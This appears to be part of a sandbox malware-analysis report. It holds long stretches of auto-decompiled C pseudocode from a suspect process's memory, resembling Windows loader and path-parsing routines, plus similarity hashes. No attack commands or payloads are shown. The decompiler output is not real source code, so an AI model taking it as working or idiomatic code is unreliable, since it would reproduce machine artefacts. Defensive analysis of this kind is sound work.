                                        				signed int _t245;
                                        				signed int _t250;
                                        				void* _t251;
                                        				signed short* _t254;
                                        				void* _t255;
                                        				signed int _t256;
                                        				void* _t257;
                                        				signed short* _t260;
                                        				signed short _t265;
                                        				signed short* _t269;
                                        				signed short _t271;
                                        				signed short** _t272;
                                        				signed short* _t275;
                                        				signed short _t282;
                                        				signed short _t283;
                                        				signed short _t290;
                                        				signed short _t299;
                                        				signed short _t307;
                                        				signed int _t308;
                                        				signed short _t311;
                                        				signed short* _t315;
                                        				signed short _t316;
                                        				void* _t317;
                                        				void* _t319;
                                        				signed short* _t321;
                                        				void* _t322;
                                        				void* _t323;
                                        				unsigned int _t324;
                                        				signed int _t325;
                                        				void* _t326;
                                        				signed int _t327;
                                        				signed int _t329;
                                        
                                        				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                        				_v8 =  *0x179d360 ^ _t329;
                                        				_t157 = _a8;
                                        				_t321 = _a4;
                                        				_t315 = __edx;
                                        				_v548 = __ecx;
                                        				_t305 = _a20;
                                        				_v560 = _a12;
                                        				_t260 = _a16;
                                        				_v564 = __edx;
                                        				_v580 = _a8;
                                        				_v572 = _t260;
                                        				_v544 = _a20;
                                        				if( *__edx <= 8) {
                                        					L3:
                                        					if(_t260 != 0) {
                                        						 *_t260 = 0;
                                        					}
                                        					_t254 =  &_v532;
                                        					_v588 = 0x208;
                                        					if((_v548 & 0x00000001) != 0) {
                                        						_v556 =  *_t315;
                                        						_v552 = _t315[2];
                                        						_t161 = E016DF232( &_v556);
                                        						_t316 = _v556;
                                        						_v540 = _t161;
                                        						goto L17;
                                        					} else {
                                        						_t306 = 0x208;
                                        						_t298 = _t315;
                                        						_t316 = E016C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                        						if(_t316 == 0) {
                                        							L68:
                                        							_t322 = 0xc0000033;
                                        							goto L39;
                                        						} else {
                                        							while(_v581 == 0) {
                                        								_t233 = _v588;
                                        								if(_t316 > _t233) {
                                        									_t234 = _v548;
                                        									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                        										_t254 = L016C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                        										if(_t254 == 0) {
                                        											_t169 = 0xc0000017;
                                        										} else {
                                        											_t298 = _v564;
                                        											_v588 = _t316;
                                        											_t306 = _t316;
                                        											_t316 = E016C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                        											if(_t316 != 0) {
                                        												continue;
                                        											} else {
                                        												goto L68;
                                        											}
                                        										}
                                        									} else {
                                        										goto L90;
                                        									}
                                        								} else {
                                        									_v556 = _t316;
                                        									 *((short*)(_t329 + 0x32)) = _t233;
                                        									_v552 = _t254;
                                        									if(_t316 < 2) {
                                        										L11:
                                        										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                        											_t161 = 5;
                                        										} else {
                                        											if(_t316 < 6) {
                                        												L87:
                                        												_t161 = 3;
                                        											} else {
                                        												_t242 = _t254[2] & 0x0000ffff;
                                        												if(_t242 != 0x5c) {
                                        													if(_t242 == 0x2f) {
                                        														goto L16;
                                        													} else {
                                        														goto L87;
                                        													}
                                        													goto L101;
                                        												} else {
                                        													L16:
                                        													_t161 = 2;
                                        												}
                                        											}
                                        										}
                                        									} else {
                                        										_t243 =  *_t254 & 0x0000ffff;
                                        										if(_t243 == 0x5c || _t243 == 0x2f) {
                                        											if(_t316 < 4) {
                                        												L81:
                                        												_t161 = 4;
                                        												goto L17;
                                        											} else {
                                        												_t244 = _t254[1] & 0x0000ffff;
                                        												if(_t244 != 0x5c) {
                                        													if(_t244 == 0x2f) {
                                        														goto L60;
                                        													} else {
                                        														goto L81;
                                        													}
                                        												} else {
                                        													L60:
                                        													if(_t316 < 6) {
                                        														L83:
                                        														_t161 = 1;
                                        														goto L17;
                                        													} else {
                                        														_t245 = _t254[2] & 0x0000ffff;
                                        														if(_t245 != 0x2e) {
                                        															if(_t245 == 0x3f) {
                                        																goto L62;
                                        															} else {
                                        																goto L83;
                                        															}
                                        														} else {
                                        															L62:
                                        															if(_t316 < 8) {
                                        																L85:
                                        																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                        																goto L17;
                                        															} else {
                                        																_t250 = _t254[3] & 0x0000ffff;
                                        																if(_t250 != 0x5c) {
                                        																	if(_t250 == 0x2f) {
                                        																		goto L64;
                                        																	} else {
                                        																		goto L85;
                                        																	}
                                        																} else {
                                        																	L64:
                                        																	_t161 = 6;
                                        																	goto L17;
                                        																}
                                        															}
                                        														}
                                        													}
                                        												}
                                        											}
                                        											goto L101;
                                        										} else {
                                        											goto L11;
                                        										}
                                        									}
                                        									L17:
                                        									if(_t161 != 2) {
                                        										_t162 = _t161 - 1;
                                        										if(_t162 > 5) {
                                        											goto L18;
                                        										} else {
                                        											switch( *((intOrPtr*)(_t162 * 4 +  &M016C45F8))) {
                                        												case 0:
                                        													_v568 = 0x1681078;
                                        													__eax = 2;
                                        													goto L20;
                                        												case 1:
                                        													goto L18;
                                        												case 2:
                                        													_t163 = 4;
                                        													goto L19;
                                        											}
                                        										}
                                        										goto L41;
                                        									} else {
                                        										L18:
                                        										_t163 = 0;
                                        										L19:
                                        										_v568 = 0x16811c4;
                                        									}
                                        									L20:
                                        									_v588 = _t163;
                                        									_v564 = _t163 + _t163;
                                        									_t306 =  *_v568 & 0x0000ffff;
                                        									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                        									_v576 = _t265;
                                        									if(_t265 > 0xfffe) {
                                        										L90:
                                        										_t322 = 0xc0000106;
                                        									} else {
                                        										if(_t321 != 0) {
                                        											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                        												if(_v580 != 0) {
                                        													goto L23;
                                        												} else {
                                        													_t322 = 0xc0000106;
                                        													goto L39;
                                        												}
                                        											} else {
                                        												_t177 = _t306;
                                        												goto L25;
                                        											}
                                        											goto L101;
                                        										} else {
                                        											if(_v580 == _t321) {
                                        												_t322 = 0xc000000d;
                                        											} else {
                                        												L23:
                                        												_t173 = L016C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                        												_t269 = _v592;
                                        												_t269[2] = _t173;
                                        												if(_t173 == 0) {
                                        													_t322 = 0xc0000017;
                                        												} else {
                                        													_t316 = _v556;
                                        													 *_t269 = 0;
                                        													_t321 = _t269;
                                        													_t269[1] = _v576;
                                        													_t177 =  *_v568 & 0x0000ffff;
                                        													L25:
                                        													_v580 = _t177;
                                        													if(_t177 == 0) {
                                        														L29:
                                        														_t307 =  *_t321 & 0x0000ffff;
                                        													} else {
                                        														_t290 =  *_t321 & 0x0000ffff;
                                        														_v576 = _t290;
                                        														_t310 = _t177 & 0x0000ffff;
                                        														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                        															_t307 =  *_t321 & 0xffff;
                                        														} else {
                                        															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                        															E016EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                        															_t329 = _t329 + 0xc;
                                        															_t311 = _v580;
                                        															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                        															 *_t321 = _t225;
                                        															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                        																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                        															}
                                        															goto L29;
                                        														}
                                        													}
                                        													_t271 = _v556 - _v588 + _v588;
                                        													_v580 = _t307;
                                        													_v576 = _t271;
                                        													if(_t271 != 0) {
                                        														_t308 = _t271 & 0x0000ffff;
                                        														_v588 = _t308;
                                        														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                        															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                        															E016EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                        															_t329 = _t329 + 0xc;
                                        															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                        															 *_t321 = _t213;
                                        															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                        																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                        															}
                                        														}
                                        													}
                                        													_t272 = _v560;
                                        													if(_t272 != 0) {
                                        														 *_t272 = _t321;
                                        													}
                                        													_t306 = 0;
                                        													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                        													_t275 = _v572;
                                        													if(_t275 != 0) {
                                        														_t306 =  *_t275;
                                        														if(_t306 != 0) {
                                        															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                        														}
                                        													}
                                        													_t181 = _v544;
                                        													if(_t181 != 0) {
                                        														 *_t181 = 0;
                                        														 *((intOrPtr*)(_t181 + 4)) = 0;
                                        														 *((intOrPtr*)(_t181 + 8)) = 0;
                                        														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                        														if(_v540 == 5) {
                                        															_t182 = E016A52A5(1);
                                        															_v588 = _t182;
                                        															if(_t182 == 0) {
                                        																E016BEB70(1, 0x17979a0);
                                        																goto L38;
                                        															} else {
                                        																_v560 = _t182 + 0xc;
                                        																_t185 = E016BAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                        																if(_t185 == 0) {
                                        																	_t324 = _v588;
                                        																	goto L97;
                                        																} else {
                                        																	_t306 = _v544;
                                        																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                        																	 *(_t306 + 4) = _t282;
                                        																	_v576 = _t282;
                                        																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                        																	 *_t306 = _t325;
                                        																	if( *_t282 == 0x5c) {
                                        																		_t149 = _t325 - 2; // -2
                                        																		_t283 = _t149;
                                        																		 *_t306 = _t283;
                                        																		 *(_t306 + 4) = _v576 + 2;
                                        																		_t185 = _t283 & 0x0000ffff;
                                        																	}
                                        																	_t324 = _v588;
                                        																	 *(_t306 + 2) = _t185;
                                        																	if((_v548 & 0x00000002) == 0) {
                                        																		L97:
                                        																		asm("lock xadd [esi], eax");
                                        																		if((_t185 | 0xffffffff) == 0) {
                                        																			_push( *((intOrPtr*)(_t324 + 4)));
                                        																			E016E95D0();
                                        																			L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                        																		}
                                        																	} else {
                                        																		 *(_t306 + 0xc) = _t324;
                                        																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                        																	}
                                        																	goto L38;
                                        																}
                                        															}
                                        															goto L41;
                                        														}
                                        													}
                                        													L38:
                                        													_t322 = 0;
                                        												}
                                        											}
                                        										}
                                        									}
                                        									L39:
                                        									if(_t254 !=  &_v532) {
                                        										L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                        									}
                                        									_t169 = _t322;
                                        								}
                                        								goto L41;
                                        							}
                                        							goto L68;
                                        						}
                                        					}
                                        					L41:
                                        					_pop(_t317);
                                        					_pop(_t323);
                                        					_pop(_t255);
                                        					return E016EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                        				} else {
                                        					_t299 = __edx[2];
                                        					if( *_t299 == 0x5c) {
                                        						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                        						if(_t256 != 0x5c) {
                                        							if(_t256 != 0x3f) {
                                        								goto L2;
                                        							} else {
                                        								goto L50;
                                        							}
                                        						} else {
                                        							L50:
                                        							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                        								goto L2;
                                        							} else {
                                        								_t251 = E016E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                        								_pop(_t319);
                                        								_pop(_t326);
                                        								_pop(_t257);
                                        								return E016EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                        							}
                                        						}
                                        					} else {
                                        						L2:
                                        						_t260 = _v572;
                                        						goto L3;
                                        					}
                                        				}
                                        				L101:
                                        			}
















































































                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80e7bc5696f85438648d412e7d3fa25f909d2fee9c2fc41ea874d7fad504d58e
                                        • Instruction ID: 900e654efd0c347096d28cf36d80092885cf962ca1e24b4dd738bd0eb82cebe4
                                        • Opcode Fuzzy Hash: 80e7bc5696f85438648d412e7d3fa25f909d2fee9c2fc41ea874d7fad504d58e
                                        • Instruction Fuzzy Hash: 78F16E70508351CBD725CF19C890A7ABBE2EF98B14F54892EF586C7391EB34D882CB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 87%
                                        			E016BD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                        				signed int _v8;
                                        				intOrPtr _v20;
                                        				signed int _v36;
                                        				intOrPtr* _v40;
                                        				signed int _v44;
                                        				signed int _v48;
                                        				signed char _v52;
                                        				signed int _v60;
                                        				signed int _v64;
                                        				signed int _v68;
                                        				signed int _v72;
                                        				signed int _v76;
                                        				intOrPtr _v80;
                                        				signed int _v84;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				signed int _v108;
                                        				signed int _v112;
                                        				signed int _v116;
                                        				intOrPtr _v120;
                                        				signed int _v132;
                                        				char _v140;
                                        				char _v144;
                                        				char _v157;
                                        				signed int _v164;
                                        				signed int _v168;
                                        				signed int _v169;
                                        				intOrPtr _v176;
                                        				signed int _v180;
                                        				signed int _v184;
                                        				intOrPtr _v188;
                                        				signed int _v192;
                                        				signed int _v200;
                                        				signed int _v208;
                                        				intOrPtr* _v212;
                                        				char _v216;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				signed int _t204;
                                        				void* _t208;
                                        				signed int _t211;
                                        				signed int _t216;
                                        				intOrPtr _t217;
                                        				intOrPtr* _t218;
                                        				signed int _t226;
                                        				signed int _t239;
                                        				signed int* _t247;
                                        				signed int _t249;
                                        				void* _t252;
                                        				signed int _t256;
                                        				signed int _t269;
                                        				signed int _t271;
                                        				signed int _t277;
                                        				signed int _t279;
                                        				intOrPtr _t283;
                                        				signed int _t287;
                                        				signed int _t288;
                                        				void* _t289;
                                        				signed char _t290;
                                        				signed int _t292;
                                        				signed int* _t293;
                                        				signed int _t306;
                                        				signed int _t307;
                                        				signed int _t308;
                                        				signed int _t309;
                                        				signed int _t310;
                                        				intOrPtr _t311;
                                        				intOrPtr _t312;
                                        				signed int _t319;
                                        				signed int _t320;
                                        				signed int* _t324;
                                        				signed int _t337;
                                        				signed int _t338;
                                        				signed int _t339;
                                        				signed int* _t340;
                                        				void* _t341;
                                        				signed int _t344;
                                        				signed int _t348;
                                        				signed int _t349;
                                        				signed int _t351;
                                        				intOrPtr _t353;
                                        				void* _t354;
                                        				signed int _t356;
                                        				signed int _t358;
                                        				intOrPtr _t359;
                                        				signed int _t363;
                                        				signed short* _t365;
                                        				void* _t367;
                                        				intOrPtr _t369;
                                        				void* _t370;
                                        				signed int _t371;
                                        				signed int _t372;
                                        				void* _t374;
                                        				signed int _t376;
                                        				void* _t384;
                                        				signed int _t387;
                                        
                                        				_v8 =  *0x179d360 ^ _t376;
                                        				_t2 =  &_a20;
                                        				 *_t2 = _a20 & 0x00000001;
                                        				_t287 = _a4;
                                        				_v200 = _a12;
                                        				_t365 = _a8;
                                        				_v212 = _a16;
                                        				_v180 = _a24;
                                        				_v168 = 0;
                                        				_v157 = 0;
                                        				if( *_t2 != 0) {
                                        					__eflags = E016B6600(0x17952d8);
                                        					if(__eflags == 0) {
                                        						goto L1;
                                        					} else {
                                        						_v188 = 6;
                                        					}
                                        				} else {
                                        					L1:
                                        					_v188 = 9;
                                        				}
                                        				if(_t365 == 0) {
                                        					_v164 = 0;
                                        					goto L5;
                                        				} else {
                                        					_t363 =  *_t365 & 0x0000ffff;
                                        					_t341 = _t363 + 1;
                                        					if((_t365[1] & 0x0000ffff) < _t341) {
                                        						L109:
                                        						__eflags = _t341 - 0x80;
                                        						if(_t341 <= 0x80) {
                                        							_t281 =  &_v140;
                                        							_v164 =  &_v140;
                                        							goto L114;
                                        						} else {
                                        							_t283 =  *0x1797b9c; // 0x0
                                        							_t281 = L016C4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                        							_v164 = _t281;
                                        							__eflags = _t281;
                                        							if(_t281 != 0) {
                                        								_v157 = 1;
                                        								L114:
                                        								E016EF3E0(_t281, _t365[2], _t363);
                                        								_t200 = _v164;
                                        								 *((char*)(_v164 + _t363)) = 0;
                                        								goto L5;
                                        							} else {
                                        								_t204 = 0xc000009a;
                                        								goto L47;
                                        							}
                                        						}
                                        					} else {
                                        						_t200 = _t365[2];
                                        						_v164 = _t200;
                                        						if( *((char*)(_t200 + _t363)) != 0) {
                                        							goto L109;
                                        						} else {
                                        							while(1) {
                                        								L5:
                                        								_t353 = 0;
                                        								_t342 = 0x1000;
                                        								_v176 = 0;
                                        								if(_t287 == 0) {
                                        									break;
                                        								}
                                        								_t384 = _t287 -  *0x1797b90; // 0x77880000
                                        								if(_t384 == 0) {
                                        									_t353 =  *0x1797b8c; // 0x1242a18
                                        									_v176 = _t353;
                                        									_t320 = ( *(_t353 + 0x50))[8];
                                        									_v184 = _t320;
                                        								} else {
                                        									E016C2280(_t200, 0x17984d8);
                                        									_t277 =  *0x17985f4; // 0x1242f08
                                        									_t351 =  *0x17985f8 & 1;
                                        									while(_t277 != 0) {
                                        										_t337 =  *(_t277 - 0x50);
                                        										if(_t337 > _t287) {
                                        											_t338 = _t337 | 0xffffffff;
                                        										} else {
                                        											asm("sbb ecx, ecx");
                                        											_t338 =  ~_t337;
                                        										}
                                        										_t387 = _t338;
                                        										if(_t387 < 0) {
                                        											_t339 =  *_t277;
                                        											__eflags = _t351;
                                        											if(_t351 != 0) {
                                        												__eflags = _t339;
                                        												if(_t339 == 0) {
                                        													goto L16;
                                        												} else {
                                        													goto L118;
                                        												}
                                        												goto L151;
                                        											} else {
                                        												goto L16;
                                        											}
                                        											goto L17;
                                        										} else {
                                        											if(_t387 <= 0) {
                                        												__eflags = _t277;
                                        												if(_t277 != 0) {
                                        													_t340 =  *(_t277 - 0x18);
                                        													_t24 = _t277 - 0x68; // 0x1242ea0
                                        													_t353 = _t24;
                                        													_v176 = _t353;
                                        													__eflags = _t340[3] - 0xffffffff;
                                        													if(_t340[3] != 0xffffffff) {
                                        														_t279 =  *_t340;
                                        														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                        														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                        															asm("lock inc dword [edi+0x9c]");
                                        															_t340 =  *(_t353 + 0x50);
                                        														}
                                        													}
                                        													_v184 = _t340[8];
                                        												}
                                        											} else {
                                        												_t339 =  *(_t277 + 4);
                                        												if(_t351 != 0) {
                                        													__eflags = _t339;
                                        													if(_t339 == 0) {
                                        														goto L16;
                                        													} else {
                                        														L118:
                                        														_t277 = _t277 ^ _t339;
                                        														goto L17;
                                        													}
                                        													goto L151;
                                        												} else {
                                        													L16:
                                        													_t277 = _t339;
                                        												}
                                        												goto L17;
                                        											}
                                        										}
                                        										goto L25;
                                        										L17:
                                        									}
                                        									L25:
                                        									E016BFFB0(_t287, _t353, 0x17984d8);
                                        									_t320 = _v184;
                                        									_t342 = 0x1000;
                                        								}
                                        								if(_t353 == 0) {
                                        									break;
                                        								} else {
                                        									_t366 = 0;
                                        									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                        										_t288 = _v164;
                                        										if(_t353 != 0) {
                                        											_t342 = _t288;
                                        											_t374 = E016FCC99(_t353, _t288, _v200, 1,  &_v168);
                                        											if(_t374 >= 0) {
                                        												if(_v184 == 7) {
                                        													__eflags = _a20;
                                        													if(__eflags == 0) {
                                        														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                        														if(__eflags != 0) {
                                        															_t271 = E016B6600(0x17952d8);
                                        															__eflags = _t271;
                                        															if(__eflags == 0) {
                                        																_t342 = 0;
                                        																_v169 = _t271;
                                        																_t374 = E016B7926( *(_t353 + 0x50), 0,  &_v169);
                                        															}
                                        														}
                                        													}
                                        												}
                                        												if(_t374 < 0) {
                                        													_v168 = 0;
                                        												} else {
                                        													if( *0x179b239 != 0) {
                                        														_t342 =  *(_t353 + 0x18);
                                        														E0172E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                        													}
                                        													if( *0x1798472 != 0) {
                                        														_v192 = 0;
                                        														_t342 =  *0x7ffe0330;
                                        														asm("ror edi, cl");
                                        														 *0x179b1e0( &_v192, _t353, _v168, 0, _v180);
                                        														 *( *0x179b218 ^  *0x7ffe0330)();
                                        														_t269 = _v192;
                                        														_t353 = _v176;
                                        														__eflags = _t269;
                                        														if(__eflags != 0) {
                                        															_v168 = _t269;
                                        														}
                                        													}
                                        												}
                                        											}
                                        											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                        												_t366 = 0xc000007a;
                                        											}
                                        											_t247 =  *(_t353 + 0x50);
                                        											if(_t247[3] == 0xffffffff) {
                                        												L40:
                                        												if(_t366 == 0xc000007a) {
                                        													__eflags = _t288;
                                        													if(_t288 == 0) {
                                        														goto L136;
                                        													} else {
                                        														_t366 = 0xc0000139;
                                        													}
                                        													goto L54;
                                        												}
                                        											} else {
                                        												_t249 =  *_t247;
                                        												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                        													goto L40;
                                        												} else {
                                        													_t250 = _t249 | 0xffffffff;
                                        													asm("lock xadd [edi+0x9c], eax");
                                        													if((_t249 | 0xffffffff) == 0) {
                                        														E016C2280(_t250, 0x17984d8);
                                        														_t342 =  *(_t353 + 0x54);
                                        														_t165 = _t353 + 0x54; // 0x54
                                        														_t252 = _t165;
                                        														__eflags =  *(_t342 + 4) - _t252;
                                        														if( *(_t342 + 4) != _t252) {
                                        															L135:
                                        															asm("int 0x29");
                                        															L136:
                                        															_t288 = _v200;
                                        															_t366 = 0xc0000138;
                                        															L54:
                                        															_t342 = _t288;
                                        															L016E3898(0, _t288, _t366);
                                        														} else {
                                        															_t324 =  *(_t252 + 4);
                                        															__eflags =  *_t324 - _t252;
                                        															if( *_t324 != _t252) {
                                        																goto L135;
                                        															} else {
                                        																 *_t324 = _t342;
                                        																 *(_t342 + 4) = _t324;
                                        																_t293 =  *(_t353 + 0x50);
                                        																_v180 =  *_t293;
                                        																E016BFFB0(_t293, _t353, 0x17984d8);
                                        																__eflags =  *((short*)(_t353 + 0x3a));
                                        																if( *((short*)(_t353 + 0x3a)) != 0) {
                                        																	_t342 = 0;
                                        																	__eflags = 0;
                                        																	E016E37F5(_t353, 0);
                                        																}
                                        																E016E0413(_t353);
                                        																_t256 =  *(_t353 + 0x48);
                                        																__eflags = _t256;
                                        																if(_t256 != 0) {
                                        																	__eflags = _t256 - 0xffffffff;
                                        																	if(_t256 != 0xffffffff) {
                                        																		E016D9B10(_t256);
                                        																	}
                                        																}
                                        																__eflags =  *(_t353 + 0x28);
                                        																if( *(_t353 + 0x28) != 0) {
                                        																	_t174 = _t353 + 0x24; // 0x24
                                        																	E016D02D6(_t174);
                                        																}
                                        																L016C77F0( *0x1797b98, 0, _t353);
                                        																__eflags = _v180 - _t293;
                                        																if(__eflags == 0) {
                                        																	E016DC277(_t293, _t366);
                                        																}
                                        																_t288 = _v164;
                                        																goto L40;
                                        															}
                                        														}
                                        													} else {
                                        														goto L40;
                                        													}
                                        												}
                                        											}
                                        										}
                                        									} else {
                                        										L016BEC7F(_t353);
                                        										L016D19B8(_t287, 0, _t353, 0);
                                        										_t200 = E016AF4E3(__eflags);
                                        										continue;
                                        									}
                                        								}
                                        								L41:
                                        								if(_v157 != 0) {
                                        									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                        								}
                                        								if(_t366 < 0 || ( *0x179b2f8 |  *0x179b2fc) == 0 || ( *0x179b2e4 & 0x00000001) != 0) {
                                        									L46:
                                        									 *_v212 = _v168;
                                        									_t204 = _t366;
                                        									L47:
                                        									_pop(_t354);
                                        									_pop(_t367);
                                        									_pop(_t289);
                                        									return E016EB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                        								} else {
                                        									_v200 = 0;
                                        									if(( *0x179b2ec >> 0x00000008 & 0x00000003) == 3) {
                                        										_t355 = _v168;
                                        										_t342 =  &_v208;
                                        										_t208 = E01756B68(_v168,  &_v208, _v168, __eflags);
                                        										__eflags = _t208 - 1;
                                        										if(_t208 == 1) {
                                        											goto L46;
                                        										} else {
                                        											__eflags = _v208 & 0x00000010;
                                        											if((_v208 & 0x00000010) == 0) {
                                        												goto L46;
                                        											} else {
                                        												_t342 = 4;
                                        												_t366 = E01756AEB(_t355, 4,  &_v216);
                                        												__eflags = _t366;
                                        												if(_t366 >= 0) {
                                        													goto L46;
                                        												} else {
                                        													asm("int 0x29");
                                        													_t356 = 0;
                                        													_v44 = 0;
                                        													_t290 = _v52;
                                        													__eflags = 0;
                                        													if(0 == 0) {
                                        														L108:
                                        														_t356 = 0;
                                        														_v44 = 0;
                                        														goto L63;
                                        													} else {
                                        														__eflags = 0;
                                        														if(0 < 0) {
                                        															goto L108;
                                        														}
                                        														L63:
                                        														_v112 = _t356;
                                        														__eflags = _t356;
                                        														if(_t356 == 0) {
                                        															L143:
                                        															_v8 = 0xfffffffe;
                                        															_t211 = 0xc0000089;
                                        														} else {
                                        															_v36 = 0;
                                        															_v60 = 0;
                                        															_v48 = 0;
                                        															_v68 = 0;
                                        															_v44 = _t290 & 0xfffffffc;
                                        															E016BE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                        															_t306 = _v68;
                                        															__eflags = _t306;
                                        															if(_t306 == 0) {
                                        																_t216 = 0xc000007b;
                                        																_v36 = 0xc000007b;
                                        																_t307 = _v60;
                                        															} else {
                                        																__eflags = _t290 & 0x00000001;
                                        																if(__eflags == 0) {
                                        																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                        																	__eflags = _t349 - 0x10b;
                                        																	if(_t349 != 0x10b) {
                                        																		__eflags = _t349 - 0x20b;
                                        																		if(_t349 == 0x20b) {
                                        																			goto L102;
                                        																		} else {
                                        																			_t307 = 0;
                                        																			_v48 = 0;
                                        																			_t216 = 0xc000007b;
                                        																			_v36 = 0xc000007b;
                                        																			goto L71;
                                        																		}
                                        																	} else {
                                        																		L102:
                                        																		_t307 =  *(_t306 + 0x50);
                                        																		goto L69;
                                        																	}
                                        																	goto L151;
                                        																} else {
                                        																	_t239 = L016BEAEA(_t290, _t290, _t356, _t366, __eflags);
                                        																	_t307 = _t239;
                                        																	_v60 = _t307;
                                        																	_v48 = _t307;
                                        																	__eflags = _t307;
                                        																	if(_t307 != 0) {
                                        																		L70:
                                        																		_t216 = _v36;
                                        																	} else {
                                        																		_push(_t239);
                                        																		_push(0x14);
                                        																		_push( &_v144);
                                        																		_push(3);
                                        																		_push(_v44);
                                        																		_push(0xffffffff);
                                        																		_t319 = E016E9730();
                                        																		_v36 = _t319;
                                        																		__eflags = _t319;
                                        																		if(_t319 < 0) {
                                        																			_t216 = 0xc000001f;
                                        																			_v36 = 0xc000001f;
                                        																			_t307 = _v60;
                                        																		} else {
                                        																			_t307 = _v132;
                                        																			L69:
                                        																			_v48 = _t307;
                                        																			goto L70;
                                        																		}
                                        																	}
                                        																}
                                        															}
                                        															L71:
                                        															_v72 = _t307;
                                        															_v84 = _t216;
                                        															__eflags = _t216 - 0xc000007b;
                                        															if(_t216 == 0xc000007b) {
                                        																L150:
                                        																_v8 = 0xfffffffe;
                                        																_t211 = 0xc000007b;
                                        															} else {
                                        																_t344 = _t290 & 0xfffffffc;
                                        																_v76 = _t344;
                                        																__eflags = _v40 - _t344;
                                        																if(_v40 <= _t344) {
                                        																	goto L150;
                                        																} else {
                                        																	__eflags = _t307;
                                        																	if(_t307 == 0) {
                                        																		L75:
                                        																		_t217 = 0;
                                        																		_v104 = 0;
                                        																		__eflags = _t366;
                                        																		if(_t366 != 0) {
                                        																			__eflags = _t290 & 0x00000001;
                                        																			if((_t290 & 0x00000001) != 0) {
                                        																				_t217 = 1;
                                        																				_v104 = 1;
                                        																			}
                                        																			_t290 = _v44;
                                        																			_v52 = _t290;
                                        																		}
                                        																		__eflags = _t217 - 1;
                                        																		if(_t217 != 1) {
                                        																			_t369 = 0;
                                        																			_t218 = _v40;
                                        																			goto L91;
                                        																		} else {
                                        																			_v64 = 0;
                                        																			E016BE9C0(1, _t290, 0, 0,  &_v64);
                                        																			_t309 = _v64;
                                        																			_v108 = _t309;
                                        																			__eflags = _t309;
                                        																			if(_t309 == 0) {
                                        																				goto L143;
                                        																			} else {
                                        																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                        																				__eflags = _t226 - 0x10b;
                                        																				if(_t226 != 0x10b) {
                                        																					__eflags = _t226 - 0x20b;
                                        																					if(_t226 != 0x20b) {
                                        																						goto L143;
                                        																					} else {
                                        																						_t371 =  *(_t309 + 0x98);
                                        																						goto L83;
                                        																					}
                                        																				} else {
                                        																					_t371 =  *(_t309 + 0x88);
